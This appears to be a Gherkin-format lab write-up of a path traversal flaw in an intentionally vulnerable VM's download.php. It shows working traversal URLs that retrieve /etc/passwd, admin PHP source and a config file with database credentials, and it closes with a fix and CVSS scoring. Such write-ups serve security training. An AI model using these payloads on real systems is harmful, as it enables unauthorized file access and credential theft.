## Version 1.4.1
## language: en

Feature:
  TOE:
    Graceful’s VulnVM
  Location:
    http://192.168.0.27/download.php - item (field)
  CWE:
    CWE-22: Improper Limitation of a Pathname to a
    Restricted Directory ('Path Traversal')
  Rule:
    REQ.037 Parameters without sensitive data
      https://fluidattacks.com/web/rules/037/
  Goal:
    Get access to sentive information of the system
  Recommendation:
    Sanitize all input data and implement a whitelist

  Background:
  Hacker's software:
    | <Software name> | <Version>      |
    | Arch Linux      | 5.7.10-arch1-1 |
    | Chrome          | 86.0.4209.2    |
    | Nmap            | 7.8.0          |
    | OWASP ZAP       | 2.9.0          |

  TOE information:
    Given I am running the vulnerable machine at
    """
    192.168.0.27
    """

  Scenario: Normal use case
    Given I access to the following page
    """
    http://192.168.0.27/
    """
    When I click the link
    """
    Catalogue
    """
    Then a file is downloaded
    """
    Brochure.pdf
    """

  Scenario: Static detection
    Given the file
    """
    getfile.php
    """
    When I look at the code from lines 7 to 16
    """
    7 if ($_COOKIE["level"] == "2") {
    8  $patterns = array();
    9  $patterns[0] = '/\.\.\//';
    10  $dl_file = preg_replace($patterns, '', $_GET['item']);
    11  $dl_file = filter_var($dl_file, FILTER_SANITIZE_URL);
    12  $fullPath = $path.$dl_file;
    13 }
    14 else {
    15  $fullPath = $path.$_GET['item'];
    16 }
    """
    Then I notice that correct input validation only happens when
    """
    $_COOKIE["level"] == "2"
    """
    And I conclude that data validation will be skipped if "level" is not "2"

  Scenario: Dynamic detection
    Given I scan the target machine
    When I scan open ports with
    """
    $ nmap 192.168.0.27
    """
    Then I get the following output
    """
    $ nmap 192.168.0.27
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-29 14:05 -05
    Nmap scan report for 192.168.0.27
    Host is up (0.00057s latency).
    Not shown: 999 filtered ports
    PORT   STATE SERVICE
    80/tcp open  http

    Nmap done: 1 IP address (1 host up) scanned in 15.07 seconds
    """
    And I enter in
    """
    http://192.168.0.27/
    """
    And I confirm that a web server is running
    Given That I know a web server is up
    When I look for vulnerabilities with
    """
    OWASP ZAP
    """
    Then I found a path traversal vulerability [evidence] (evidence.png)
    """
    http://192.168.0.27/download.php?item=..%2F..%2F..%2F..%2F..%2F..%2F
    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
    """
    When I check the value "level" in the session cookie, I find
    """
    1
    """
    Then I realize, I will be able to bypass the correct input validation
    And I access to the site and the following file is downloaded
    """
    passwd
    """
    When I open it, I see the following
    """
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
    systemd-timesync:x:999:997:systemd Time Synchronization:/:/sbin/nologin
    systemd-network:x:998:996:systemd Network Management:/:/sbin/nologin
    systemd-resolve:x:997:995:systemd Resolver:/:/sbin/nologin
    systemd-bus-proxy:x:996:994:systemd Bus Proxy:/:/sbin/nologin
    dbus:x:81:81:System message bus:/:/sbin/nologin
    abrt:x:173:173::/etc/abrt:/sbin/nologin
    avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/...
    webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    squid:x:23:23::/var/spool/squid:/sbin/nologin
    mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
    tcpdump:x:72:72::/:/sbin/nologin
    </div>
    <div class="products-list"></div>
    """
    And I conclude that the site is vulnerable to a path traversal attack

  Scenario: Exploitation
    Given I know the path traversal vulnerability exists
    When I see a path in some of the request made by "OWASP ZAP"
    """
    http://192.168.0.27/admin/
    """
    Then I enter in that address and see some files
    """
    admin.php admincontent.php adminheader.php adminnav.php
    """
    And I try to see every file, but I got redirected to the login page
    Given There might be interesting information in those files
    When I enter the following to get the first file
    """
    http://192.168.0.27/download.php?item=../admin/admin.php
    """
    Then get the file
    """
    admin.php
    """
    And I open it to see nothing interesting
    When I get the next file with
    """
    http://192.168.0.27/download.php?item=../admin/admincontent.php
    """
    Then I open it to see the following
    """
    <?php
    include '../connection.php';
    if (isset($_COOKIE['SessionId'])) {
        $loadDetails = "SELECT session FROM tblMembers WHERE session='" .
        $_COOKIE['SessionId'] . "' AND admin=1;";
        $detailsResult = mysql_query($loadDetails, $link);
        $detailsData = mysql_fetch_assoc($detailsResult);

        if ($detailsData['session'] == $_COOKIE['SessionId']) {
    echo '<div class="content">
    <div class="highlights">Welcome Admin</div>
    <div class="products-list"></div>';
        }
        else {
            header('Location: /account.php?login=admin');
        }
    }
    else {
        header('Location: /account.php?login=session');
    }
    ?>
    </div>
    <div class="products-list"></div>
    """
    And I notice in the second line that other file is being used
    """
    include '../connection.php';
    """
    When I use the same strategy to download that file with
    """
    http://192.168.0.27/download.php?item=../connection.php
    """
    Then I open the file and I see
    """
    <?php
    include 'config.php';
    if (!$link = mysql_connect($host, $user, $pass)) {
        echo 'Could not connect to mysql';
        exit;
    }

    if (!mysql_select_db($database, $link)) {
        echo 'Could not select database';
        exit;
    }
    ?>
    </div>
    <div class="products-list"></div>
    """
    And I again notice that another file is being used
    """
    include 'config.php';
    """
    When I use the same strategy to download that file with
    """
    http://192.168.0.27/download.php?item=../config.php
    """
    Then I open the file to find
    """
    <?php
    $host = 'localhost';
    $user = 'root';
    $pass = 'Alexis*94';
    $database = 'seattle';
    ?>
    </div>
    <div class="products-list"></div>
    """
    And I have found the credentials for the database used by the application

  Scenario: Remediation
    Given I have the file
    """
    getfile.php
    """
    When I delete the cookie comparison and make the validation always happen
    """
    $patterns = array();
    $patterns[0] = '/\.\.\//';
    $dl_file = preg_replace($patterns, '', $_GET['item']);
    $dl_file = filter_var($dl_file, FILTER_SANITIZE_URL);
    $fullPath = $path.$dl_file;
    """
    Then I retry the path traversal attack
    """
    http://192.168.0.27/download.php?item=..%2F..%2F..%2F..%2F..%2F..%2F
    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
    """
    And I now I only get a blank page
    And I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.2/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    5.1/10 (Medium) - CR:M/MC:L/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2020-07-30
